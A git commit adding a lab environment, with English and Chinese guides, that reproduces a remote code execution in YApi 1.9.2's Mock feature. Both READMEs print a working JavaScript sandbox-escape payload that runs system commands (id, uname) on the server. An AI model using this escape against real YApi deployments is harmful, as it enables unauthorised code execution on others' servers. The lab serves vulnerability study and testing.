first commit

yapi/unacc/README.md

@@ -0,0 +1,49 @@
+# YApi Registration and Mock Remote Code Execution
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+YApi is a API management tool developed by Node.JS. If registration of the YApi server is enabled, attackers will be able to execute arbitrary Javascript code in the Mock page.
+
+References:
+
+- <https://paper.seebug.org/1639/>
+- <https://www.freebuf.com/vuls/279967.html>
+
+## Vulnerability Environment
+
+Execute following command to start a YApi server 1.9.2:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse the `http://localhost:3000` to see the index page of the YApi.
+
+## Vulnerability Reproduce
+
+Register a normal user then create a project and an interface:
+
+![](1.png)
+
+![](2.png)
+
+There is a "Mock Tab" that you can input JavaScript code, put the evil code into textarea:
+
+```
+const sandbox = this
+const ObjectConstructor = this.constructor
+const FunctionConstructor = ObjectConstructor.constructor
+const myfun = FunctionConstructor('return process')
+const process = myfun()
+mockJson = process.mainModule.require("child_process").execSync("id;uname -a;pwd").toString()
+```
+
+![](3.png)
+
+Then, go back to the preview tab and see the Mock URL:
+
+![](4.png)
+
+Open that URL, Mock script is executed and you can see the output:
+
+![](5.png)

yapi/unacc/README.zh-cn.md

@@ -0,0 +1,49 @@
+# YApi开放注册导致RCE
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+YApi是一个API管理工具。如果注册功能开放，攻击者可以使用Mock功能执行任意代码。
+
+参考链接：
+
+- <https://paper.seebug.org/1639/>
+- <https://www.freebuf.com/vuls/279967.html>
+
+## 漏洞环境
+
+执行如下命令启动一个YApi 1.9.2：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:3000`即可查看到YApi首页。
+
+## 漏洞复现
+
+首先，注册一个用户，并创建项目和接口：
+
+![](1.png)
+
+![](2.png)
+
+接口中有一个Mock页面可以填写代码，我们填写包含恶意命令的代码：
+
+```
+const sandbox = this
+const ObjectConstructor = this.constructor
+const FunctionConstructor = ObjectConstructor.constructor
+const myfun = FunctionConstructor('return process')
+const process = myfun()
+mockJson = process.mainModule.require("child_process").execSync("id;uname -a;pwd").toString()
+```
+
+![](3.png)
+
+然后，回到“预览”页面可以获得Mock的URL：
+
+![](4.png)
+
+打开这个URL，即可查看到命令执行的结果：
+
+![](5.png)

yapi/unacc/config.json

@@ -0,0 +1,23 @@
+{
+    "port": "3000",
+    "adminAccount": "admin@admin.com",
+    "timeout":120000,
+    "db": {
+        "servername": "mongo",
+        "DATABASE": "yapi",
+        "port": 27017,
+        "user": "root",
+        "pass": "root",
+        "authSource": "admin"
+    },
+    "mail": {
+        "enable": true,
+        "host": "smtp.163.com",
+        "port": 465,
+        "from": "***@163.com",
+        "auth": {
+            "user": "***@163.com",
+            "pass": "*****"
+        }
+    }
+}

yapi/unacc/docker-compose.yml

@@ -0,0 +1,16 @@
+version: '2'
+services:
+  mongo:
+    image: mongo:5.0.6
+    environment:
+      MONGO_INITDB_ROOT_USERNAME: root
+      MONGO_INITDB_ROOT_PASSWORD: root
+      MONGO_INITDB_DATABASE: yapi
+  web:
+    image: vulhub/yapi:1.9.2
+    ports:
+    - "3000:3000"
+    volumes:
+    - ./config.json:/usr/config.json
+    environment:
+    - MONGO_ADDR=mongo:27017